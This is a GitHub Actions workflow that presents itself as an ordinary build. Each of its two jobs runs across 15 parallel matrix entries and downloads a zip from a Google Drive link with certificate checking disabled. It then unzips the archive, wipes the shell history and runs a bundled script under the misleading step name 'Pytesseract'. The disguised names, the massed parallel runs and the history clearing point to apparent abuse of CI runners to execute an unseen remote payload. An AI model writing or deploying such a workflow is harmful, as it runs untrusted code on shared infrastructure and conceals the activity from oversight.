name: neothantuong531tool
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  DISTRIBUTE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Collect', 'Design', 'Review', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=17MhyhVHU4p5tq6SLpIexanl3paei6ur9" -O Prometheus.zip
        unzip -o Prometheus.zip
        rm Prometheus.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  SETUP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Collect', 'Design', 'Review', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=17MhyhVHU4p5tq6SLpIexanl3paei6ur9" -O Prometheus.zip
        unzip -o Prometheus.zip
        rm Prometheus.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
